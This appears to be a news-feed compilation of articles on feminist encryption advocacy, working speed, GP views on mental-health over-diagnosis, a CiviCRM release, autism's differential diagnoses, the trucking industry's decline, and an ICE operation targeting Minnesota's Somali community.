Encryption and Feminism: We’re Briging The Conversation Online

Internet Exchange
internet.exchangepoint.tech
2025-12-04 15:25:51
A follow-up to our Mozilla Festival session on Encryption and Feminism: Reimagining Child Safety Without Surveillance....
Original Article
privacy and security

A follow-up to our Mozilla Festival session on Encryption and Feminism: Reimagining Child Safety Without Surveillance.

Encryption and Feminism: We’re Briging The Conversation Online
Gerda Binder, Hera Hussain, Georgia Bullen, Audrey Hingle, Lucy Purdon, and Mallory Knodel in our MozFest session.

By Audrey Hingle

Our MozFest session on Encryption and Feminism: Reimagining Child Safety Without Surveillance was bigger than a one-hour festival slot could contain. The room filled fast, people were turned away at the door, and the Q&A could have gone on twice as long. Many attendees told us afterwards that this is the conversation they’ve been waiting to have. That feminist perspectives on encryption aren’t just welcome, they’re needed. So we’re opening the circle wider and taking it online so more people can join in.

In the room, we heard reflections that reminded us why this work matters. In feedback forms, attendees told us encryption isn’t only a security feature, it’s “part of upholding the rights of kids and survivors too, now let’s prove that to the rest of the world!” Another participant said they left ready to “be a champion of encryption to protect all.” Someone else named what many feel: “More feminist spaces are needed!”

It quickly became clear that this work is collective. It’s about shifting assumptions, building new narratives, and demanding technology that does not treat privacy as optional or as something only privacy hardliners or cryptography experts care about. Privacy is safety, dignity, and a precondition for seeking help. It is necessary to explore identity, form relationships, and grow up. Privacy is a human right.

We also heard calls for clarity and practicality: to reduce jargon, show people what encryption actually does, and push for privacy-preserving features more generally like screenshot protection and sender-controlled forwarding.

Participants also reminded us that encryption must account for disparity and intersectionality. Surveillance is not experienced equally. Some communities never get to “opt in” or consent at all. Feminist principles for encryption must reflect that reality.

And importantly, we heard gratitude for the tone of the session: open, candid, grounded, and not afraid to ask hard questions. “Normalize the ability to have tricky conversations in movement spaces,” someone wrote. We agree. These conversations shouldn’t only happen at conferences, they should live inside policy rooms, product roadmaps, activist communities, parenting forums, classrooms.

So let’s keep going.

New Virtual Session: Encryption and Feminism: Reimagining Child Safety Without Surveillance

🗓️ Feb 10, 4PM GMT, Online

Whether you joined us at MozFest, could't make it to Barcelona, or were one of the many who could not get into the room, this session is for you. We are running the event again online so more people can experience the conversation in full. We will revisit the discussion, share insights from the panel, and walk through emerging Feminist Encryption Principles, including the ideas and questions raised by participants.

Speakers will include Chayn’s Hera Hussain , Superbloom’s Georgia Bullen , Courage Everywhere’s Lucy Purdon , UNICEF’s Gerda Binder , and IX’s Mallory Knodel, Ramma Shahid Cheema and Audrey Hingle.

Help us grow this conversation. Share it with friends and colleagues who imagine a future where children are protected without surveillance and where privacy is not a privilege, but a right.

We hope you’ll join us!

Related : If you care about privacy-preserving messaging apps, Phoenix R&D is inviting feedback through a short survey asking for input on what features matter most for those in at-risk contexts.


Hidden Influences: How algorithmic recommenders shape our lives by Dr. Luca Belli

New book from IX client Dr. Luca Belli looks at how recommender systems function, how they are measured, and why accountability remains difficult. Luca draws on his experience co-founding Twitter’s ML Ethics, Transparency and Accountability work, contributing to standards at NIST, and advising the European Commission on recommender transparency.

Now available via MEAP on Manning. Readers can access draft chapters as they are released, share feedback directly, and receive the final version when complete. Suitable for researchers, policy teams, engineers, and anyone involved in governance or evaluation of large-scale recommendation systems. It is also written for general readers, with no advanced technical knowledge required, so when you're done with it, hand it to a curious family member who wants to understand how algorithms decide what they see.

Support the Internet Exchange

If you find our emails useful, consider becoming a paid subscriber! You'll get access to our members-only Signal community where we share ideas, discuss upcoming topics, and exchange links. Paid subscribers can also leave comments on posts and enjoy a warm, fuzzy feeling.

Not ready for a long-term commitment? You can always leave us a tip .

Become A Paid Subscriber


Internet Governance

Digital Rights

Technology for Society

Privacy and Security

Upcoming Events

Careers and Funding Opportunities

United States

Global

What did we miss? Please send us a reply or write to editor@exchangepoint.tech .

Why Speed Matters

Hacker News
lemire.me
2025-12-06 12:46:42
Comments...
Original Article

The one constant that I have observed in my professional life is that people underestimate the need to move fast.

Of course, doing good work takes time. I once spent six months writing a URL parser. But the fact that it took so long is not a feature, it is not a positive, it is a negative.

If everything is slow-moving around you, it is likely not going to be good. To fully make use of your brain, you need to move as close as possible to the speed of your thought.

If I give you two PhD students, one who completed their thesis in two years and one who took eight years… you can be almost certain that the two-year thesis will be much better.

Moving fast does not mean that you complete your projects quickly. Projects have many parts, and getting everything right may take a long time.

Nevertheless, you should move as fast as you can.

For multiple reasons:

1. A common mistake is to spend a lot of time—too much time—on a component of your project that does not matter. I once spent a lot of time building a podcast-like version of a course… only to find out later that students had no interest in the podcast format.

2. You learn by making mistakes. The faster you make mistakes, the faster you learn.

3. Your work degrades, becomes less relevant with time. And if you work slowly, you will be more likely to stick with your slightly obsolete work. You know that professor who spent seven years preparing lecture notes twenty years ago? He is not going to throw them away and start again, as that would be a new seven-year project. So he will keep teaching using aging lecture notes until he retires and someone finally updates the course.

What if you are doing open-heart surgery? Don’t you want someone who spends days preparing and who works slowly? No. You almost surely want the surgeon who does many, many open-heart surgeries. They are very likely to be the best one.

Now stop being so slow. Move!

'Life being stressful is not an illness' – GPs on mental health over-diagnosis

Hacker News
www.bbc.com
2025-12-06 12:06:53
Comments...
Original Article

Catherine Burns , Health correspondent ,

Vicki Loader , Health producer and

Harriet Agerholm

Getty Images A female GP wearing a pink blouse and a stethoscope around her neck, talks to a female patient with long, brown hair (who is blurred and the back of her head is visible only in the foreground) Getty Images

Hundreds of GPs across England have told the BBC they think mental health problems are being over-diagnosed.

One commonly-held view by family doctors, our research suggests, is that society tends to over-medicalise normal life stresses. But they're also concerned about how hard it is to get help for patients with mental health conditions.

Earlier this week, the Health Secretary ordered an independent review into the reasons for a rising demand for mental health, ADHD and autism services in England, and where the gaps in support are.

BBC News sent a questionnaire to more than 5,000 GPs in England asking about their experiences helping patients with mental health concerns. Their responses give an insight into how challenging this issue is for many family doctors.

Of the 752 GPs who took part in our research, 442 said they believed that over-diagnosis is a concern. More said mental health problems were over-diagnosed by a little than over-diagnosed by a lot.

Eighty-one GPs who responded felt that mental health problems were under-diagnosed.

Over-diagnosis of mental health issues was far from their only concern. Many GPs also told us they were worried about a lack of help for patients.

For our questionnaire, GPs answered several questions and were invited to leave anonymous comments.

One of the most common themes to emerge can be summed up in this remark from a GP: "Life being stressful is not an illness."

Another commented: "As a society we seem to have forgotten that life can be tough - a broken heart or grief is painful and normal, and we have to learn to cope."

Yet another argued that giving people labels such as anxiety or depression "over-medicalises life and emotional difficulties", and that this was taking resources away from people with severe needs.

A small number of GPs were strongly critical of some patients. One described them as "dishonest, narcissistic… gaming a system free at point of use."

Overall, one in five adults in England report having a common mental health condition, like anxiety or depression, according to a survey published by NHS England. Rates are even higher in young people. For 16-24 year olds, it's one-in-four.

The GPs who took part in our research identified 19-34 year olds as the age group who needed the most support with mental health issues.

One commented that young adults "seem to be less resilient since Covid", suggesting they're more concerned with getting a diagnosis than finding coping strategies.

But other GPs said the real issue was under-diagnosis.

"People need to be accepted, helped and encouraged to live life," one said, while another said services were very reluctant "to fully assess and diagnose" patients.

There are almost 40,000 fully-qualified GPs in England and we cannot know if the group who took part in our research is representative of all family doctors.

We asked GPs who had been in the job for at least five years how the amount of time they spend working on mental health has changed. Almost all said it has increased.

The three main reasons they gave for this were:

  • having to support patients who can't get good quality mental health help elsewhere
  • practical issues like housing, employment or finances impacting patients' mental health
  • patients thinking they have a mental health issue, when they're dealing with normal challenges in life

Earlier this year, the health secretary Wes Streeting told the BBC's Laura Kuenssberg that mental health conditions were being over-diagnosed and too many people were being "written off". He now says his comments were "divisive" and that "he failed to capture the complexity of this problem."

It is thought that 2.5 million people in England have ADHD – including those without a diagnosis. Some NHS services for ADHD have closed their doors to new patients because they are struggling to cope with the demand.

Patients have told the BBC about how hard they find it to get proper care and support .

All in all, there's a consensus that the NHS is not meeting rising demand in this area.

A clear majority of GPs who took part in our research, 508 of 752, said there was rarely or never enough good quality mental health help available for adults in their area.

Even more, some 640 GPs, told us they were worried about getting young patients the help they needed.

One GP called mental health support "a national tragedy". Another said: "A child literally needs to be holding a knife to be taken seriously and the second that knife is put down, services disengage."

We also asked GPs if they ever prescribe medication because they worry patients will not get other help, such as talking therapies, quickly enough.

The most common answer - from 447 GPs - is that they do this "routinely".

"I find myself regularly reaching for antidepressants, which I know may only help short term and won't help prevent recurrence," one GP commented.

Professor Victoria Tzortziou Brown, chair of the Royal College of GPs, said there's a "difficult balance" for family doctors to strike when patients expect a diagnosis for mental health problems, but don't meet the criteria.

"We must be careful, as a society, not to medicalise the full range of normal feelings and behaviours and ensure GPs are not pressured into making diagnoses that conflict with their clinical judgement," she said.

"But equally we must avoid dismissing genuine mental health concerns as 'over-diagnosis' which risks discouraging people from seeking help."

The independent review into demand for mental health services has promised to listen to all the evidence and come up with "genuinely useful" recommendations.

Minesh Patel, associate director of policy and influencing at mental health charity Mind, said there was "no credible evidence" that mental health problems were being over-diagnosed.

"What we do know though is that the number of people experiencing mental health problems has increased, with 1 in 5 adults now living with a common mental health condition according to the Adult Psychiatric Morbidity Survey," he said.

Additional reporting by Elena Bailey and Phil Leake.

CiviCRM 6.9 Release

CiviCRM
civicrm.org
2025-12-04 12:01:14
Thanks to the hard work of CiviCRM’s incredible community of contributors, CiviCRM version 6.9.0 is now ready to download. This is a regular monthly release that includes new features and bug fixes. Details are available in the monthly release notes. Your are encouraged to upgrade now f...
Original Article

Thanks to the hard work of CiviCRM’s incredible community of contributors, CiviCRM version 6.9.0 is now ready to download. This is a regular monthly release that includes new features and bug fixes. Details are available in the monthly release notes .

Your are encouraged to upgrade now for the most stable, secure CiviCRM experience:

Download CiviCRM

Users of the CiviCRM Extended Security Releases (ESR) do not need to upgrade. The current version of ESR is CiviCRM 6.4.x.

Support CiviCRM

CiviCRM is community driven and is sustained through code contributions and generous financial support.

We are committed to keeping CiviCRM free and open, forever . We depend on your support to help make that happen. Please consider supporting CiviCRM today .

Big thanks to all our partners , members , ESR subscribers and contributors who give regularly to support CiviCRM for everyone.

Credits

AGH Strategies - Alice Frumin; Agileware Pty Ltd - Iris, Justin Freeman; akwizgran; ALL IN APPLI - Guillaume Sorel; Artful Robot - Rich Lott; BrightMinded Ltd - Bradley Taylor; Christian Wach; Christina; Circle Interactive - Dave Jenkins, Rhiannon Davies; CiviCoop - Jaap Jansma, Erik Hommel; CiviCRM - Coleman Watts, Tim Otten, Benjamin W; civiservice.de - Gerhard Weber; CompuCo - Muhammad Shahrukh; Coop SymbioTIC - Mathieu Lutfy, Samuel Vanhove, Shane Bill; cs-bennwas; CSES (Chelmsford Science and Engineering Society) - Adam Wood; Dave D; DevApp - David Cativo; Duncan Stanley White; Freeform Solutions - Herb van den Dool; Fuzion - Jitendra Purohit, Luke Stewart; Giant Rabbit - Nathan Freestone; Greenpeace Central and Eastern Europe - Patrick Figel; INOEDE Consulting - Nadaillac; JacquesVanH; JMA Consulting - Seamus Lee; Joinery - Allen Shaw; Lemniscus - Noah Miller; Makoa - Usha F. Matisson; Megaphone Technology Consulting - Jon Goldberg; MJW Consulting - Matthew Wire; Mosier Consulting - Justin Mosier; Nicol Wistreich; OrtmannTeam GmbH - Andreas Lietz; Progressive Technology Project - Jamie McClelland; Progressive Technology Project - Jamie McClelland; Richard Baugh; Skvare - Sunil Pawar; Sarah Farrell-Graham; Squiffle Consulting - Aidan Saunders; Tadpole Collective - Kevin Cristiano; Wikimedia Foundation - Eileen McNaughton; Wildsight - Lars Sander-Green

New Extensions

  • Membership AJAX Permissions - This CiviCRM extension modifies the API permissions to allow it to be called with just the "Access AJAX API" permission instead of requiring the more restrictive default permissions.
  • civiglific - Integrates Glific ( https://glific.org ) with CiviCRM to sync contact groups and send automated WhatsApp messages and receipts to contributors.
  • Reply to Inbound Email - Makes it easier to reply to email, quote the original, etc.

View all latest extensions

Autism's Confusing Cousins

Hacker News
www.psychiatrymargins.com
2025-12-06 11:18:40
Comments...
Original Article

“I think that these days what we mean by “autism” is basically “weird person disease.””

Sorbie Richner , Rich Girl Rehab

“Accurate diagnosis requires consideration of multiple diagnoses. Sometimes, different diagnoses can overlap with one another and can only be differentiated in subtle and nuanced ways, but particular diagnoses vary considerably in levels of public awareness. As such, an individual may meet the diagnostic criteria for one diagnosis but self-diagnoses with a different diagnosis because it is better known.”

Sam Fellowes , Self-Diagnosis in Psychiatry and the Distribution of Social Resources

Unsurprisingly, these days I meet many people in the psychiatric clinic who are convinced that they have autism, or suspect (with various degrees of confidence) that they have autism, or report being diagnosed with autism at some point in their lives by some clinician. And for a fair number of such individuals, I cannot say with reasonable certitude that they have autism. The reasons they give for considering autism vary widely, but tend to be along the lines of…

  • “Eye contact makes me very uncomfortable.”

  • “I suck at small talk.”

  • “I have rigid routines.”

  • “I hyper-focus on my hobbies.”

  • “I am always fidgeting.”

  • “Social interaction exhausts me.”

  • “I really bad at making friends.”

  • “I don’t fit in; people find me weird.”

What’s interesting about many of the items above is that the number one diagnostic possibility in my mind is an anxiety disorder of some sort. I remember seeing a woman who was a classic example of someone with high neuroticism, poor self-esteem, and severe social anxiety, and she had believed for much of her life that she was autistic because some random doctor somewhere at some point (she couldn’t even remember who or what sort of assessment this involved) had told her that she had autism, and she believed it because it fit in with her experience of being awkward-shy-weird.

It is common for me to meet individuals who think they have autism and find myself thinking, “schizoid,” “obsessive compulsive,” “cluster B,” “social anxiety,” “generalized anxiety,” “trauma,” “socially awkward,”… None of these, however, have the mimetic virality of autism.

I don’t want to come across as being skeptical of the reality of autism as a diagnosis or as asserting that most people are misdiagnosed. Autism exists, to the extent that any psychiatric disorder exists. Not everyone is misdiagnosed, perhaps even most people. I am not trying to say, “autism is bullshit.” It’s not. I offer the diagnosis of autism as a clinician perhaps as often as I find myself doubting it.

What intrigues me is that people are drawn to autism as a diagnosis because it seems to offer recognition of something they’ve lived with: they may be deeply awkward, terribly shy, or bad with people, they may struggle with social interactions, they may find other people annoying, other people may find them weird, they may have a hard time connecting to others, they may have been bullied, and they may have directed their loneliness or introversion towards peculiar interests or hobbies. Autism seems to them to capture all that. It seems like an apt and appealing narrative. But autism may also be the only relevant diagnosis they’ve heard of or are familiar with. They haven’t seen any cool TikToks about being schizoid. No one’s offering them quizzes about being schizotypal. A random pediatrician or primary care doc is not going to tell them they have an obsessive-compulsive style of personality. So when some professional doubts that they have “autism,” they see it as a dismissal or rejection of their “lived experience.” Of course, I am weird-anxious-awkward. How can you say otherwise? What they don’t know is that the choice is not between autism or nothing, but rather between autism and about a dozen other diagnostic possibilities.

So for the sake of our collective sanity, let’s consider a few of them…

To be diagnosed with autism spectrum disorder according to DSM-5, a person must have ongoing difficulties in social communication and interaction in all three areas: trouble with back-and-forth social connection, problems with nonverbal communication like eye contact and body language, and difficulty making or keeping friendships. They also must show at least two types of repetitive or restricted behaviors , such as repetitive movements or phrases, needing things to stay the same, having very intense focused interests, or being unusually sensitive (or under-sensitive) to things like sounds, textures, or lights. These patterns must have been present since early childhood (even if they weren’t noticed until later when life got more complicated), lead to substantial impairment in functioning , and can’t simply be explained by intellectual disability (or other psychiatric disorders).

To “have” autism is simply to demonstrate this cluster of characteristics at the requisite level of severity and pervasiveness. It doesn’t mean that the person has a specific type of brain attribute or a specific set of genes that differentiates them from non-autistics. No such internal essence exists for the notion as currently conceptualized.

Autism spectrum is wide enough to have very different prototypes within it. On one end we have profound autism, representing someone with severe autistic traits who is completely dependent on others for care and has substantial intellectual disability or very limited language ability. At the other end, we have successful nerdy individuals with autistic traits and superior intelligence, often seen in science or academia, à la Sheldon Cooper. (Holden Thorp, editor-in-chief of the Science journals and former UNC chancellor, for example, has publicly disclosed his own autism diagnosis.) This wide range is confusing enough on its own, even without considering other conditions that can present with autism-like features.

Autism cannot be identified via medical “tests.” It is identified via clinical information in the form of history, observation, and interaction, and the less information available or the more unreliable the information provided is, the more uncertain we’ll be. To have autism is basically a judgment call that one is a good match to a descriptive prototype. We can get this judgment wrong, and we sometimes do get it wrong. (There is nothing wrong with this fallibility as such, as long as we recognize it. Lives have been built on foundations less sturdy.)

Autism as a category or identity has taken on a life of its own. I am aware that not everyone in the neurodiversity crowd accepts the legitimacy of clinician judgments or clinical criteria as outlined in the diagnostic manuals, such as the DSM and ICD. There are other ways to ground the legitimacy of self-diagnoses, in theoretically virtuous accounts or pragmatic uses , which require distinct considerations of their own; I don’t reject that. But here, I am concerned with autism as a clinical diagnosis and the accuracy of autism understood in terms of alignment with clinical diagnosis. Would competent and knowledgeable clinicians with access to all relevant clinical information concur that the person’s presentation meets diagnostic criteria for autism? If you don’t really care about that, this post is not for you.

Lascaux Cave

Schizoid personality describes people who have little desire for close relationships and prefer solitary activities. Unlike people who are simply shy or socially anxious, individuals with schizoid personality style genuinely don’t find relationships rewarding or necessary. They typically appear emotionally detached or cold, show restricted emotional expression, seem indifferent to praise or criticism, and have few if any close friends or confidants. They often live quietly on the margins of society, pursuing solitary interests or jobs. They keep their inner worlds (which can be quite rich) private and don’t seek emotional intimacy with others.

In autism, social difficulties stem from genuine challenges with processing social information: difficulty reading facial expressions, understanding implied meanings, picking up on social cues, knowing unwritten social rules, etc. In schizoid personality, the person typically understands social conventions but simply isn’t motivated to engage with them. They withdraw from genuine disinterest. Schizoid personality also lacks the additional features of autism (repetitive or restricted behaviors, various sensory sensitivities).

Schizotypal personality describes people who have odd or eccentric beliefs, unusual perceptual experiences, and difficulties with close relationships. Unlike schizoid personality (which involves simple disinterest in relationships), schizotypal includes strange ways of thinking and perceiving the world. People with schizotypal personality might believe in telepathy, feel they have special powers, think random events have special meaning for them personally, or have unusual perceptual experiences (like feeling a presence in the room or hearing whispers). They typically have few close friends, experience social anxiety that doesn’t improve with familiarity, and may appear paranoid or suspicious of others’ motives. Both schizotypal personality and autism can involve social difficulties and odd or eccentric behavior, but in schizotypal personality, the peculiarity comes from magical thinking, paranoid ideas, and perceptual distortions.

Obsessive-compulsive personality describes people who are preoccupied with orderliness, perfectionism, and control. These individuals are rigid rule-followers who want things to be done “the right way,” have difficulty delegating tasks, and get caught up in details and lists to the point where they lose sight of the main goal. They tend to be workaholics who neglect leisure and friendships, are inflexible about matters of morality or ethics, and are often stubborn and controlling. Both obsessive-compulsive personality and autism can involve rigid adherence to routines, rules, and specific ways of doing things. In obsessive-compulsive personality, the inflexibility comes from anxiety about loss of control. The person is trying to, consciously or unconsciously, manage anxiety through control and perfectionism. In autism, the need for sameness and routine serves different functions. It provides predictability in a world that feels confusing or it helps with sensory regulation rather than anxiety-driven perfectionism.

Severe social anxiety is an intense, persistent fear of social situations where a person might be judged, embarrassed, or humiliated. Social anxiety disorder involves overwhelming fear that interferes with daily life. People with this condition worry excessively about saying something stupid, looking foolish, or being rejected. They often avoid social situations entirely, which can lead to isolation, difficulty maintaining employment, and problems forming relationships. Both social anxiety and autism involve social difficulties and withdrawal. Social anxiety usually improves significantly in comfortable, safe environments (like with close family or friends), while autistic social differences tend to be more consistent across all contexts.

Borderline personality disorder involves intense emotional instability, unstable relationships, fear of abandonment, and a shifting sense of self, with people experiencing rapid mood swings and chaotic relationships that alternate between idealization and devaluation of others. While it can resemble autism through social difficulties, emotional dysregulation, rigid thinking, and feeling different from others, the key distinctions are that borderline centers on intense relationship preoccupations and emotional chaos, whereas autism involves genuine difficulty understanding social cues and communication; borderline features rapidly shifting identity and relationship-triggered mood swings, while autism includes stable self-concept, sensory sensitivities, restricted interests, and literal communication that aren’t present in borderline; and borderline symptoms fluctuate dramatically with relationship stability while autistic traits remain consistent across contexts.

Social communication disorder is a condition in DSM-5 where someone has significant, ongoing difficulty using verbal and nonverbal communication appropriately in social contexts. People with social communication disorder struggle with the “pragmatic” aspects of language, that is, knowing how to use language effectively in social situations. They may have trouble understanding when to take turns in conversation, knowing how much detail to give, adjusting their speaking style for different situations, understanding implied meanings or hints, picking up on nonverbal cues like body language and facial expressions, and knowing how to start, maintain, or end conversations naturally. This makes forming friendships and relationships difficult and affects life functioning. The social communication problems in social communication disorder look nearly identical to the “Criterion A” features of autism. However, unlike autism, people with social communication disorder don’t show repetitive behaviors, restricted interests, sensory sensitivities, or the need for sameness and routine.

Social communication disorder is rarely diagnosed in favor of autism primarily because autism provides access to critical services, insurance coverage, educational support, and legal protections that social communication disorder does not reliably offer, creating strong practical incentives for families and clinicians to prefer the autism diagnosis. Additionally, autism has an established evidence base, validated assessment tools, clear intervention protocols, and a large supportive community with a neurodiversity-affirming culture, while social communication disorder has none of these. It has no community, minimal research, no specific treatments, and little professional awareness since it was only introduced in the DSM in 2013. Service delivery, insurance, and educational systems are built entirely around autism rather than social communication disorder, and since both conditions require similar interventions for social-communication difficulties, there’s little practical incentive to make the diagnostic distinction, especially when the boundary between them (whether restricted/repetitive behaviors are truly absent or just subtle) is often unclear and clinicians are often unsure the distinction really matters.

Trauma-related disorders, particularly from early developmental trauma, severe neglect, or disrupted attachment, can mimic autism through social withdrawal and avoidance of eye contact (defensive protection rather than social processing difficulties), communication delays and difficulties (from lack of language exposure or trauma’s impact on brain development), emotional dysregulation and meltdowns (from emotional dysregulation rather than sensory overload), repetitive self-soothing behaviors (anxiety management rather than stimming), sensory sensitivities (hypervigilance rather than sensory processing differences), and rigid need for routine (anxiety-driven safety-seeking rather than cognitive processing style).

Severe early deprivation can create “quasi-autistic” patterns that can be genuinely difficult to distinguish. The critical distinctions are that trauma-related difficulties typically improve significantly in safe, nurturing environments and with adequate psychological treatment, show more variability across contexts (worse with triggers), are tied to identifiable adverse experiences rather than present from earliest infancy, and lack the restricted interests and genuine social communication processing deficits of autism.

Social awkwardness refers to social ineptness without meaningful impairment that falls within what is considered normal or typical human variation. This can be mistaken for autism because both may involve limited friendships, preference for solitude, conversation difficulties, reduced eye contact, and intense interests, particularly fueled by online self-diagnosis culture and broad autism awareness. The key distinctions are that socially awkward individuals understand what they should do socially but find it difficult or uninteresting (versus genuinely not understanding unwritten rules), show significant improvement with practice and maturity, are more comfortable in specific contexts, lack the sensory sensitivities and restricted/repetitive behaviors required for autism diagnosis, and generally achieve life goals despite awkwardness rather than experiencing clinically significant impairment.

Selective Mutism, Intellectual Disability (without autism), Stereotypic Movement Disorder, Attention-Deficit/Hyperactivity Disorder (ADHD), Schizophrenia Spectrum Disorders, Avoidant Personality Disorder, Attachment Disorders, Generalized Anxiety Disorder, Obsessive-Compulsive Disorder, and Rett Syndrome (a characteristic pattern of developmental regression after initial normal development, typically 6-18 months).

Comorbidity is possible and expected. Someone can be autistic and have maladaptive personality patterns, trauma histories, or anxiety disorders that complicate the presentation. Developmental context, response to relationships, and subjective experiences are all very important in looking beyond the surface presentation to understanding the meaning and functions of behaviors.

See also:

Share

How America's "truck-driver shortage" made the industry a hellscape

Hacker News
www.freightwaves.com
2025-12-06 10:53:56
Comments...
Original Article

Over the past few months, I’ve spoken with hundreds of senior executives at America’s largest trucking companies. Nearly all say they only recently discovered the massive influx of foreign drivers and motor carriers. Most assumed the trend was gradual; none realized it was exponential.

Few had ever heard the term “non-domiciled CDL” until this summer or understood how many drivers with little or no real training have flooded the industry. They failed to understand that despite their own investments in upgraded training and compliance efforts in recent years, that the smallest operators had been handed a massive gift: the ability to “train” their own truck drivers, with little to no oversight from Federal regulators.

These changes were driven by a long-standing belief—pushed hard by the American Trucking Associations (ATA)—that the U.S. faces a permanent truck-driver shortage. The ATA’s solution was to lobby Congress and FMCSA to lower every barrier to entry, convinced that new drivers would flow to large ATA-member fleets rather than small operators.

That assumption was rooted in an old reality: twenty years ago, only the biggest carriers offered real-time tracking, electronic tendering, and direct shipper relationships. Small carriers and brokers were stuck with phone, fax, and leftover freight.

That world no longer exists.

Fueled by billions in venture capital and private equity, freight brokers have not only caught up on technology—they’ve leapfrogged the large fleets. They offer single-source routing guides, superior automation, and, crucially, no obligation to enforce hours-of-service, speed limiters, or driver-qualification standards. Brokers simply buy the cheapest capacity available.

When the ATA successfully lobbied to dismantle entry barriers, it inadvertently handed the industry to those brokers and to the least-compliant segment of the market.

Key regulatory changes that removed barriers and gutted safety enforcement:

  • 2016 – DOT stops enforcing English-proficiency requirements for CDLs
  • 2018 – ELD mandate implemented; self-certified devices with intentional back doors allow unlimited editing of driving hours
  • 2019 – Non-domiciled CDLs introduced, permitting foreign nationals to obtain U.S. commercial licenses
  • 2022 – Entry-Level Driver Training rule triggers explosion of unaccredited “CDL mills” selling licenses for $500–$1,000 in days with virtually no training

These minimally trained foreign drivers cannot pass the vetting of large, compliant carriers (no work authorization, poor English, zero experience). They end up at small, often foreign-owned fleets that pay 40% below market and routinely run 14–20-hour days using tampered ELDs.

Three additional accelerants turned a bad situation into a catastrophe:

  1. Freight brokers now control ≈⅓ of all loads and often award them to the lowest bidder, pushing spot rates below the cost of legal operation.
  2. The Biden-era immigration surge delivered millions of new arrivals seeking work; foreign-owned fleets recruited aggressively—higher pay than at home, no experience needed, free “housing” in the sleeper berth.
  3. During the COVID freight boom, carriers and brokers offshored hundreds of thousands of dispatch and brokerage jobs. When the Great Freight Recession hit and those positions were eliminated, many laid-off overseas workers used their newfound industry knowledge to orchestrate cargo theft from jurisdictions beyond U.S. law-enforcement reach.

The results are undeniable:

  • Legitimate carriers and drivers can barely break even; trucking has become an economic backwater motor carriers that follow the rules
  • Cargo theft is now an industrial-scale national-security crisis coordinated by foreign dispatchers and brokers working in concert with foreign-born drivers inside the United States.
  • Despite billions spent on safety technology, fatal truck-involved crashes are up ≈40% since 2014—almost entirely because of untrained, overworked, and inexperienced drivers now operating 80,000-pound rigs.

In short, a well-intentioned but catastrophically naive campaign to “fix the driver shortage” combined with regulatory loopholes, unchecked immigration, technology back doors, and offshoring has fundamentally broken America’s trucking industry in less than a decade—and virtually no one in Washington or in corporate corner offices saw it coming.

U.S. Citizens With Somali Roots Are Carrying Their Passports Amid Minnesota ICE Crackdown

Intercept
theintercept.com
2025-12-06 10:00:00
ICE’s operation against Minnesota’s Somali community is seen not as an immigration raid but as a racist intimidation campaign. The post U.S. Citizens With Somali Roots Are Carrying Their Passports Amid Minnesota ICE Crackdown appeared first on The Intercept....
Original Article

As dozens of agents from U.S. Immigration and Customs Enforcement surged into Minnesota’s Twin Cities this week as part of a federal crackdown targeting the Somali diaspora, it struck fear in the hearts of community members.

It’s not just immigrants, however, worried over ICE’s presence. The rhetoric behind the operation — notably racist rants from Donald Trump about Somalis at large — prompted legal residents of Somali descent to reel from fear.

“I’ve had a number of people reach out to me who are actually U.S. citizens who are wondering if they can have their citizenship revoked for a traffic ticket, or asking how they can prove their citizenship,” said Linus Chan, the faculty director of the University of Minnesota Law School’s Detainee Rights Clinic. “People are worried about their family and friends and neighbors, but even citizens are worried for themselves.”

“This is absolutely a racist weaponization of ICE against an entire community.”

The operation, announced this week amid a rising tide of vitriol aimed at Minnesota’s Somali diaspora, isn’t likely to result in booming deportations from Minneapolis and Saint Paul. The Somali community is largely made up of American citizens and permanent residents.

“Ultimately this isn’t going to yield results in terms of numbers of arrests or removal of people,” said Ana Pottratz Acosta, who leads the Immigration and Human Rights Clinic at the University of Minnesota Law School. “This is absolutely a racist weaponization of ICE against an entire community.”

Though many Somali residents cannot be legally deported, some community members are at risk. In some cases, however, the number of potential immigrants with issues doesn’t accord with the scale of the crackdown.

Take temporary protected status, or TPS, which is bestowed on some refugees in the country. The ICE raids came on the heels of a decision by Trump last month to rescind TPS for Somali residents, effectively depriving them of legal status in the country. While previous moves to rescind TPS for refugee communities have affected hundreds of thousands of refugees from Haiti and Venezuela, the number of Somalis with TPS stood at just 705, according to a congressional report earlier this year. Minnesota Gov. Tim Walz said about 300 Somalis previously receiving protected status are living in Minnesota.

Still, things are tense as reports of ICE raids pop up across the city, according to Luis Argueta, a spokesperson for Monarca Rapid Response, a community group that tracks ICE.

“We’re really feeling it,” Argueta said. “We have cases where ICE is showing up at three or four locations across our Twin Cities.”

Argueta said an observer with Monarca Rapid Response had witnessed an incident in which federal agents grappled with a man of East African descent in front of a house, telling onlookers they were trying to identify the man. In a video of that incident posted to TikTok by MPR , the local NPR affiliate, agents can be heard saying they will release the man if he gives them the information they’re looking for.

“They literally just profiled an East African man.”

“We are identifying who he is,” an agent is heard saying. “We will let you know if there is a warrant.”

Argueta said, “They literally just profiled an East African man.”

According to MPR, the agents left the scene shortly thereafter without anyone in custody. In video captured by a local Fox affiliate showing a similar scene, two men from Somalia were questioned by masked ICE agents before showing their papers and being let go.

And with a dearth of deportable Somalis to detain, ICE agents have been going after Latino immigrants in their stead, Argueta said.

“The rest of the immigrant community in the Twin Cities is on alert,” Argueta said. “It really feels like this administration is going to use whatever narrative that it wants to spin up to justify the damage and the hurt.”

Targeting All Somalis

Minnesota is home to the largest Somali diaspora community in the country, with steady growth since the 1990s, when a civil war drove refugees to the state as part of resettlement programs. In the decades since, Somalis have become a significant minority and a political force, with Democratic Rep. Ilhan Omar as their most visible face .

Omar has been a constant thorn in the side of Trump, who singled her out by name in comments this week justifying the crackdown.

The remarks about Omar were part of escalating rhetoric from the right against Somalis. Last week, Trump made baseless claims in a social media post that “Somalian gangs” were “roving the streets looking for ‘prey.’”

He continued his tirade at a Cabinet meeting on Tuesday, at which he reportedly awoke after dozing off to rage against Somalis, whom he described as “ garbage .” Trump spoke of immigrants but also showed little compunction about addressing Somalis at large. Even the New York Times, usually hesitant to directly ascribe bias to right-wing rhetoric, said the “outburst was shocking in its unapologetic bigotry.”

The racist rhetoric from the president and his allies has prompted a sense of “continual pain” in the Somali diaspora, said one community activist, who requested anonymity for fear of retaliation.

“The response from families in the community is one of overwhelming fear, based on what the president is saying,” the activist told The Intercept. “What did our families run to safety for if we’re just going to be attacked in our new home?”

Even in nearby states with significantly smaller Somali populations, the rhetoric has played out in real life, the activist said.

“I was speaking to one young brother in Omaha, Nebraska, who said that the energy had really shifted in that state,” they said. “Even at the local grocery store, he said, people don’t treat him the same. It’s just bias.”

